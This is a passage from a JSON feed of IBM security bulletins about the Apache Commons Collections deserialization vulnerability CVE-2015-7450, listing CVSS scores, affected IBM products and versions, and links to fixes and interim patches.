[_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SPSS Analytic Server 1.0.1, 2.0 and 2.1\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nSPSS Analytic Server | 2.1| [IBM SPSS Analytic Server 2.1.0.1 interim fix](<http://www.ibm.com/support/docview.wss?uid=swg24041420>) \nSPSS Analytic Server| 2.0| [IBM SPSS Analytic Server 2.0.0.1 interim fix](<http://www.ibm.com/support/docview.wss?uid=swg24041309>) \nSPSS Analytic Server| 1.0.1| [IBM SPSS Analytic Server 1.0.1 interim fix](<http://www.ibm.com/support/docview.wss?uid=swg24041366>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:22", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in bundled components affects IBM SPSS Analytic Server (CVE-2015-7450).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:22", "id": "62D0C5029A2EB3B354943CD5E9012311F875BACCD6A1D9F54159F910BD37F9CA", "href": "https://www.ibm.com/support/pages/node/272897", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T17:46:07", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise.\n\n## Vulnerability Details\n\nIBM Business Process Manager and IBM Tivoli System Automation Application Manager are shipped with both IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise. IBM SmartCloud Cost Management and IBM Tivoli Monitoring supporting products are shipped with IBM Cloud Orchestrator Enterprise. \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Principal Product and Versions**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator V2 5, V2.5.0.1| IBM Business Process Manager Standard V8.5.6 \nIBM Tivoli System Automation Application Manager V4.1 \nIBM Cloud Orchestrator Enterprise V2 5, V2.5.0.1| IBM Business Process Manager Standard V8.5.6 \nIBM Tivoli System Automation Application Manager V4.1 \nIBM SmartCloud Cost Management V2.1.0.4 \nIBM Tivoli Monitoring 6.3.0.2 \nIBM Cloud Orchestrator V2.4, V2.4.0.1, V2.4.0.2 and V2.4.0.2 Interim Fix1| IBM Business Process Manager Standard V8.5.0.1 \nIBM Tivoli System Automation Application Manager V4.1 \nIBM Cloud Orchestrator Enterprise V2.4, V2.4.0.1, V2.4.0.2 and V2.4.0.2 Interim Fix1| IBM Business Process Manager Standard V8.5.0.1 \nIBM Tivoli System Automation Application ManagerV 4.1 \nIBM SmartCloud Cost Management V2.1.0.4 \nIBM Tivoli Monitoring V6.3.0.2 \n \n## Remediation/Fixes\n\nThe recommended solution is to apply the fixes as soon as practical. Please see below for information on the fixes available. \n \nIf you are running IBM Cloud Orchestrator V2.5.0.1 upgrade to [**IBM Cloud Orchestrator V2.5.0.1 Interim Fix 1 for V2.5.0.1**](<http://www.ibm.com/support/docview.wss?uid=swg2C4000021>) or later. \n\nIf you are running IBM Cloud Orchestrator V2.4, V2.4.0.1 or V2.4.0.2, V2.4.0.2 Interim Fix1** **upgrade to **IBM Cloud Orchestrator V2.4 Fix Pack 3 (2.4.0.3) **or later.\n\nFor affected supporting products shipped with IBM Cloud Orchestrator consult the security bulletins below for vulnerability details and apply fixes as appropriate depending on your environment.\n\n**Affected Supporting Product**| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Business Process Manager \n| 8.5.0.1, 8.5.6 \n \n| [_Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21882542>) \nIBM Tivoli System Automation Application Manager| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21882528>) \n \n\n\nIf you are running IBM Cloud Orchestrator Enterprise V2.5.0.1 upgrade to [**IBM Cloud Orchestrator Enterprise V2.5.0.1 Interim Fix 1 for V2.5.0.1**](<http://www.ibm.com/support/docview.wss?uid=swg2C4000021>) or later. \n\nIf you are running IBM Cloud Orchestrator Enterprise V2.4, V2.4.0.1 or V2.4.0.2, V2.4.0.2 Interim Fix1** **upgrade to [**IBM Cloud Orchestrator Enterprise V2.4 Fix Pack 3 (2.4.0.3) or later**](<http://www.ibm.com/support/docview.wss?uid=swg24040281>).\n\n \nFor affected supporting products shipped with IBM Cloud Orchestrator Enterprise, consult the security bulletins below for vulnerability details and apply fixes as appropriate depending on your environment.\n\n \n \n**Affected Supporting Product**| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Business Process Manager| 8.5.0.1, 8.5.6| [_Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21882542>) \nIBM Tivoli System Automation Application Manager| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21882528>) \nIBM SmartCloud Cost Management| 2.1.0.4| [__Security Bulletin: A security vulnerability in IBM SmartCloud Cost Management shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise (CVE-2015-7450)__](<http://www-01.ibm.com/support/docview.wss?uid=swg21883102>) \nIBM Tivoli Monitoring| 6.3.0.2 | [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli Monitoring shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21883331>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:51", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:32:51", "id": "EB641991DE825481AC6F76AA1698D9687D265C328B6AD66B3DD9CED1ECBD64C6", "href": "https://www.ibm.com/support/pages/node/599159", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:56:15", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Worklight and IBM MobileFirst Platform Foundation.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n * IBM Worklight Consumer Edition Versions 6.0.0.0, 6.0.0.1 and 6.0.0.2\n * IBM Worklight Enterprise Edition Versions 6.0.0.0, 6.0.0.1 and 6.0.0.2\n * IBM Worklight Consumer Edition Versions 6.1.0.0, 6.1.0.1 and 6.1.0.2\n * IBM Worklight Enterprise Edition Versions 6.1.0.0, 6.1.0.1 and 6.1.0.2\n * IBM Mobile Foundation Consumer Edition Version 6.2.0.0 and 6.2.0.1\n * IBM Mobile Foundation Enterprise Edition Version 6.2.0.0 and 6.2.0.1\n * IBM MobileFirst Platform Foundation Version 6.3.0.0\n * IBM MobileFirst Platform Foundation Version 7.0.0.0\n * IBM MobileFirst Platform Foundation Version 7.1.0.0\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nIBM Worklight| 6.x| \n \n \n[PI53527](<http://www.ibm.com/support/docview.wss?uid=swg1PI53527>)| Download the latest iFix for [IBM Worklight Enterprise Edition on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+Worklight+Enterprise+Edition&release=All&platform=All&function=all&source=fc>) \n \nDownload the latest iFix for [IBM Worklight Consumer Edition on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+Worklight+Consumer+Edition&release=All&platform=All&function=all&source=fc>) \nIBM Mobile Foundation| 6.x| Download the latest iFix for [IBM Mobile Foundation Enterprise Edition on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+Mobile+Foundation+Enterprise+Edition&release=All&platform=All&function=all&source=fc>) \n \nDownload the latest iFix for [IBM Mobile Foundation Consumer Edition on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+Mobile+Foundation+Enterprise+Edition&release=All&platform=All&function=all&source=fc>) \nIBM MobileFirst Platform Foundation| 6.x and 7.x| Download the latest iFix for [IBM MobileFirst Platform Foundation on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+MobileFirst+Platform+Foundation&release=All&platform=All&function=all&source=fc>) \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:49", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Worklight and IBM MobileFirst Platform Foundation (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:32:49", "id": "5643D4C6424A9348BB845C3E966C5F250F9408B6256677E84122FA5CB87AD0D5", "href": "https://www.ibm.com/support/pages/node/619223", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:51:56", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM QRadar SIEM and IBM QRadar Incident Forensics.\n\n## Vulnerability Details\n\n**VULNERABILITY DETAILS** \n** \nCVE-ID:** [_CVE-2015-7450_](<http://security:responder@cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450>) \n** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n\u00b7 IBM QRadar 7.1 MR2 \n\n\u00b7 IBM QRadar 7.2._n_\n\n## Remediation/Fixes\n\n[\u00b7 _IBM QRadar SIEM 7.1 MR2 Patch 12_](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=Security%2BSystems&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.1.0&platform=Linux&function=fixId&fixids=7.1.0-QRADAR-QRSIEM-1104434&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)\n\n[\u00b7 _IBM QRadar/QRM/QVM/QRIF 7.2.6 Patch 1_](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=Security%2BSystems&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.2.0&platform=All&function=fixId&fixids=7.2.6-QRADAR-QRSIEM-20160106113021&includeRequisites=0&includeSupersedes=0&downloadMethod=http>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:38:45", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons could affect IBM QRadar SIEM and IBM QRadar Incident Forensics. (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T21:38:45", "id": "BE33FF3D128A47BAA318647372B1DA087A9A75A57BFD9EBAD86942F489DE4463", "href": "https://www.ibm.com/support/pages/node/540235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:40:05", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is used by the IBM Rational ClearQuest server and web components. Information about a security vulnerability affecting WAS has been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Rational ClearQuest, ClearQuest CM Server component.\n\n**Versions 9.0.1.x:**\n\nThis vulnerability only applies to the server component, and only for certain levels of WebSphere Application Server.\n\n## Remediation/Fixes\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS), which is shipped with IBM Rational ClearQuest.\n\n**Principal Product and Version(s)** | **Affected Supporting Product and Version** | **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearQuest, versions 9.0.1.x | IBM WebSphere Application Server 9.0. | [Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105>) \n \n**ClearQuest Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n9.0.1.x | \n\n 1. Determine the WAS version used by your CM server. Navigate to the CM profile directory (either the profile you specified when installing ClearQuest, or `<clearquest-home>/cqweb/cqwebprofile`), then execute the script: `bin/versionInfo.sh `(UNIX) or `bin\\versionInfo.bat `(Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section.\n 2. Identify the latest available fix (per the bulletin listed above) for the version of WAS used for CM server.\n 3. Apply the appropriate WebSphere Application Server fix directly to your CM server host. No ClearQuest-specific steps are necessary. \n \n_For 8.0.x, 7.0.x, 7.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-03T05:18:16", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server which is used by IBM Rational ClearQuest (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-03T05:18:16", "id": "4243942389BBD88941611BCA76F2DCF167E509F456B0E77C5333EC2CBE4BD595", "href": "https://www.ibm.com/support/pages/node/1115475", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:58", "description": "## Summary\n\nIBM Tivoli Storage Manager FastBack Reporting requires the dependent product IBM WebSphere Application Server. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Tivoli Storage Manager Fastback 6.1.0 through 6.1.12.1| IBM WebSphere Application Server 8.5.0.1 Full Profile \nIBM Tivoli Storage Manager Fastback 6.1.12.2 through 6.1.12.3| IBM WebSphere Application Server 8.5.5.4 Full Profile \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability identified in IBM WebSphere Application Server affecting IBM Tivoli Storage Manager FastBack Reporting (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:34", "id": "DB2B818A328E9D978E389CD017B47DF75CF8C64900E023A2B46B5D029C47E02F", "href": "https://www.ibm.com/support/pages/node/272843", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:46", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Algo Credit Limits.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Algo Credit Limits 4.7 and earlier\n\n## Remediation/Fixes\n\nA fix has been created for version 4.5.0.05 and 4.7.0.03 of the named product. Download and install the fix as soon as practicable. Fix and installation instructions are provided at the URL listed below. \n \n \n\n\nPatch Number| Download URL \n---|--- \nACLM 4.5.0.05 IF6| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.5.0.5-Algo-CreditLimits-if0006-cs:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.5.0.5-Algo-CreditLimits-if0006-cs:0&includeSupersedes=0&source=fc&login=true>) \nACLM 4.7.0.03 FP8 Solaris/Oracle| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolOra-fp0008:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolOra-fp0008:0&includeSupersedes=0&source=fc&login=true>) \nACLM 4.7.0.03 FP8 Solaris/DB2| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolDB2-fp0008:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolDB2-fp0008:0&includeSupersedes=0&source=fc&login=true>) \nACLM 4.7.0.03 FP8 RHEL/Oracle| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-RHESOra-fp0008:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-RHESOra-fp0008:0&includeSupersedes=0&source=fc&login=true>) \nACLM 4.7.0.03 FP8 AIX/Oracle| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-AIXOra-fp0008:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-AIXOra-fp0008:0&includeSupersedes=0&source=fc&login=true>) \n \nFor other versions IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T22:41:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Algo Credit Limits (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T22:41:02", "id": "8A9198697F8388FC75E2DA73A2811AC8903D8787718F479A630B9674D8C0DC03", "href": "https://www.ibm.com/support/pages/node/272175", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:12", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Content Navigator.\n\n## Vulnerability Details\n\n**CVEID: **CVE-2015-7450 \n**DESCRIPTION: **Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## 